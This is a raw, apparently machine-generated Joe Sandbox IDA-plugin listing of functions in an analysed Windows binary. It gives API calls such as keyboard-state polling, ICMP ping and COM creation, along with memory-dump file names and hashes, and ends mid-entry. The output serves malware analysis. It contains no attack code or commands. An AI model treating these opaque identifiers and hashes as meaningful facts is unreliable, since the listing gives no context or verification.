                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 136442275-0
                                                                                                                                                        • Opcode ID: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                                                                                                                                                        • Instruction ID: 89e1a5289ca5bc7aab68ea743458d9590e850fb7731a013be5e3c3410f16893f
                                                                                                                                                        • Opcode Fuzzy Hash: 0bd2634d20cbe216c568df56b4f9526b55fb8a77f28eb727e6861d91c415e63b
                                                                                                                                                        • Instruction Fuzzy Hash: 6A41FCB290416CAADF25EB50CD55EDE73BCAB08310F5041E7F519A2152EB71ABD4CFA0
                                                                                                                                                        Function 00A984A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                        • __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00AB2177: _xtow@16.LIBCMT ref: 00AB2198
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                                                        • Opcode ID: 28df67323ad746c76855c05585069e58ee0642e673f9813f5c28b704f8ff8bdf
                                                                                                                                                        • Instruction ID: 796bb3d382b71750a5c6ad137088d0aa093243d3aa54504798f98f4f54d8c555
                                                                                                                                                        • Opcode Fuzzy Hash: 28df67323ad746c76855c05585069e58ee0642e673f9813f5c28b704f8ff8bdf
                                                                                                                                                        • Instruction Fuzzy Hash: 6C41DF71600605ABDF34DB38DD82FAA7BE9EF45310F2044AAE54AD7292EA35DA41CB10
                                                                                                                                                        Function 00AB5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AB5CCA
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00AB5D63
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00AB5D99
                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00AB5DB6
                                                                                                                                                        • __allrem.LIBCMT ref: 00AB5E0C
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E28
                                                                                                                                                        • __allrem.LIBCMT ref: 00AB5E3F
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E5D
                                                                                                                                                        • __allrem.LIBCMT ref: 00AB5E74
                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AB5E92
                                                                                                                                                        • __invoke_watson.LIBCMT ref: 00AB5F03
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                                        • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                        • Instruction ID: a1602f9cdbcb11fd03974639339bb939078e6aa04981ff8923c7137fb6a0a753
                                                                                                                                                        • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                        • Instruction Fuzzy Hash: A071E872E01B16ABE714EF79CD81BEA77BDAF11364F144229F510D7682E770DA408B90
                                                                                                                                                        Function 00AD57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AD5816
                                                                                                                                                        • GetMenuItemInfoW.USER32(00B518F0,000000FF,00000000,00000030), ref: 00AD5877
                                                                                                                                                        • SetMenuItemInfoW.USER32(00B518F0,00000004,00000000,00000030), ref: 00AD58AD
                                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00AD58BF
                                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00AD5903
                                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00AD591F
                                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00AD5949
                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00AD598E
                                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00AD59D4
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD59E8
                                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD5A09
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                                        • Opcode ID: 6d3e48a39de5806435471a9b3051c14a5ed536db9ca9a831a6697895f182dd12
                                                                                                                                                        • Instruction ID: 33a8e1c4d150121a17755e4e17e5527ed78cb17477df499fa212698cdce5c19f
                                                                                                                                                        • Opcode Fuzzy Hash: 6d3e48a39de5806435471a9b3051c14a5ed536db9ca9a831a6697895f182dd12
                                                                                                                                                        • Instruction Fuzzy Hash: 9A61AC70D00659EFDB11CFB8C998EAE7BB9EB01358F18455AE442A7351DB30AD01DB20
                                                                                                                                                        Function 00AF9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00AF9AA5
                                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00AF9AA8
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AF9ACC
                                                                                                                                                        • _memset.LIBCMT ref: 00AF9ADD
                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9AEF
                                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00AF9B67
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 830647256-0
                                                                                                                                                        • Opcode ID: 2d7c3856aede3d36418bc1c3f1124d787553491210dfaa06488dc6af38b65727
                                                                                                                                                        • Instruction ID: 53484656457c26fc191d5c04df2eeb9a2ca965cc0abfc53b7b88b6ab0703f50b
                                                                                                                                                        • Opcode Fuzzy Hash: 2d7c3856aede3d36418bc1c3f1124d787553491210dfaa06488dc6af38b65727
                                                                                                                                                        • Instruction Fuzzy Hash: CB614975A00208AFDB21DFA8CD81FEE77F8AB09710F104599FA15E72A2D770AD46DB50
                                                                                                                                                        Function 00AD3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 00AD3591
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00AD3612
                                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00AD362D
                                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00AD3647
                                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00AD365C
                                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00AD3674
                                                                                                                                                        • GetKeyState.USER32(00000011), ref: 00AD3686
                                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00AD369E
                                                                                                                                                        • GetKeyState.USER32(00000012), ref: 00AD36B0
                                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00AD36C8
                                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00AD36DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                                        • Opcode ID: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                                                                                                                                                        • Instruction ID: 764e3bd28951d172ff046c1f5162df1d5ec82a8dec5379d273004bc8465f93df
                                                                                                                                                        • Opcode Fuzzy Hash: eb95dffd3b1d11d6cd926c5ffae6410b3a62a8b57478826a95378b0ec6e8b026
                                                                                                                                                        • Instruction Fuzzy Hash: F8419F65508BC97DFF319B6498143A6BEA16B21344F48805BD5C7463C2EBA4DBC8CBA3
                                                                                                                                                        Function 00ACA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00ACA2AA
                                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00ACA2F5
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00ACA307
                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00ACA327
                                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00ACA36A
                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00ACA37E
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ACA393
                                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00ACA3A0
                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3A9
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00ACA3BB
                                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00ACA3C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                                        • Opcode ID: 7cd7ec2558ae266931adb88b46bed89cf52199df78ea9dea13dfc0f3cd7af75c
                                                                                                                                                        • Instruction ID: 5b354315057889538a1dfebf72d322530e9abfa039a84683d9d7dd166f600eec
                                                                                                                                                        • Opcode Fuzzy Hash: 7cd7ec2558ae266931adb88b46bed89cf52199df78ea9dea13dfc0f3cd7af75c
                                                                                                                                                        • Instruction Fuzzy Hash: 10414D3590021DEFCB01DFA8D994EEEBBB9FF48304F518069E501A7361DB34AA45CBA1
                                                                                                                                                        Function 00AEB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • CoInitialize.OLE32 ref: 00AEB298
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00AEB2A3
                                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,00B1D8FC,?), ref: 00AEB303
                                                                                                                                                        • IIDFromString.COMBASE(?,?), ref: 00AEB376
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00AEB410
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00AEB471
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                                                        • Opcode ID: 2777bdbaaab398dd94abe10ad7a0de639e8a2ce090b11b8e61a8954c047e85b7
                                                                                                                                                        • Instruction ID: 8e8c95bb155cb16ad3a574b8200bc6ff475bb561e7a269b4e86a372ae3cafa7f
                                                                                                                                                        • Opcode Fuzzy Hash: 2777bdbaaab398dd94abe10ad7a0de639e8a2ce090b11b8e61a8954c047e85b7
                                                                                                                                                        • Instruction Fuzzy Hash: 20619C70214342AFC710DF55C989BAFB7E8AF89714F10481DF9859B2A1CB70EE44CBA2
                                                                                                                                                        Function 00AE8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00AE86F5
                                                                                                                                                        • inet_addr.WS2_32(?), ref: 00AE873A
                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00AE8746
                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00AE8754
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87C4
                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00AE87DA
                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00AE884F
                                                                                                                                                        • WSACleanup.WS2_32 ref: 00AE8855
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                        • String ID: Ping
                                                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                                                        • Opcode ID: 0046ad7631ca73bfac7d6df8ac7ae3625c6a9a7c4ab47acbc0e2cf40a3845777
                                                                                                                                                        • Instruction ID: 0fa5f7a048b40ca4ed7188891a1d9e0b14622d9b873882f5fa4230e536be546f
                                                                                                                                                        • Opcode Fuzzy Hash: 0046ad7631ca73bfac7d6df8ac7ae3625c6a9a7c4ab47acbc0e2cf40a3845777
                                                                                                                                                        • Instruction Fuzzy Hash: 3351B3316042019FDB10DF25CD85B6ABBE4EF49760F54892AF95ADB2A1DF34EC00CB51
                                                                                                                                                        Function 00AF9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00AF9C68
                                                                                                                                                        • CreateMenu.USER32 ref: 00AF9C83
                                                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00AF9C92
                                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF9D1F
                                                                                                                                                        • IsMenu.USER32(?), ref: 00AF9D35
                                                                                                                                                        • CreatePopupMenu.USER32 ref: 00AF9D3F
                                                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AF9D70
                                                                                                                                                        • DrawMenuBar.USER32 ref: 00AF9D7E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
